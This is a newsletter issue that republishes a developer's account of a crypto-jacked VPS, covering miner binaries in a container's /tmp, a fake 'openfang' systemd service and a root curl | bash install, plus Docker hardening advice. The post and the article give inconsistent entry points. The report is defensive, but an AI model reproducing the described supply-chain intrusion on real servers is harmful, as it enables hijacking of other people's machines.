The AI and Tech Weekly: June 26, 2026

SECTION 1: LINKEDIN POST

🚨 My VPS was crypto-jacked after installing an “OpenClaw” alternative. Here is what happened and how to secure your Docker containers.

1️⃣ The Trigger: Hostinger CPU limitation alert. Running top showed 196% CPU usage. 2️⃣ The Discovery: Monero miners running in /tmp of my Next.js container. 3️⃣ The Attack vector: Classic curl | bash supply chain attack run as root, combined with MDX server-side rendering execution. 4️⃣ The Fix: Hardened docker-compose.yml with read-only filesystems, dropped capabilities, and noexec on /tmp.

Read the full technical breakdown, IoCs, and compose configurations: https://belghitis.com/digest/digest-2026-06-26

#devops #security #docker #selfhosted


📰 Stories Worth Your Attention

  1. Hostinger CPU Limitation alert reveals Monero mining activity inside container /tmp.
  2. Attackers gained persistence using a systemd service masquerading as openfang.
  3. Server-side rendering of MDX documents used as remote code execution entry point.
  4. Hardening container security is essential for self-hosted developer tools.

🛠 Tips and Tricks from the Community

  • Mount /tmp as a tmpfs with noexec,nosuid,size=50m in Docker Compose to block arbitrary binary execution.
  • Set read_only: true on your container service to prevent attackers from writing payload files.
  • Limit CPU and Memory resources per container to contain performance impact in case of a breach.

🔓 Open Source Pick of the Week

  • Bumblebee — A dependency scanner from Perplexity AI to verify third-party taps and packages without running install scripts.

SECTION 2: MEDIUM ARTICLE

My VPS Was Crypto-Jacked After Installing an “OpenClaw” Alternative

Sharing this with the community so you don’t make the same mistakes.

The Trigger

Hostinger sent a CPU limitation alert on my VPS. I SSHed in and ran top: my server was pegging 196% CPU. Nothing obvious in my own apps. Then I checked Docker:

docker exec myapp ls -lah /tmp

Three ELF binaries sitting in /tmp of my Next.js container, owned by the nextjs process user:

  • HelloMrMeeseeks
  • pls_pak_choi
  • plazooza

These were Monero miners running silently for days before triggering the CPU limit.

What the Attacker Did: Step by Step

  1. I opened the door myself: I ran a few tools on my production server as root without auditing their install scripts. Classic curl | bash supply-chain risk.
  2. Persistence: The installation script registered a systemd service called openfang that restart-looped, killing the CPU.
  3. RCE into Docker: Write access to a mounted host volume allowed the execution of arbitrary code inside the container, dropping miners into /tmp.

What I Fixed

I cleaned up the binaries, disabled the rogue systemd service, and hardened docker-compose.yml with:

  • read_only: true to lock down the filesystem.
  • tmpfs /tmp:noexec,nosuid,size=50m to prevent executing binaries from /tmp.
  • cpus: 1.0 and mem_limit: 512m to cap resource usage.

Protect your servers: audit what you run, lock down your containers, and never run untrusted scripts as root.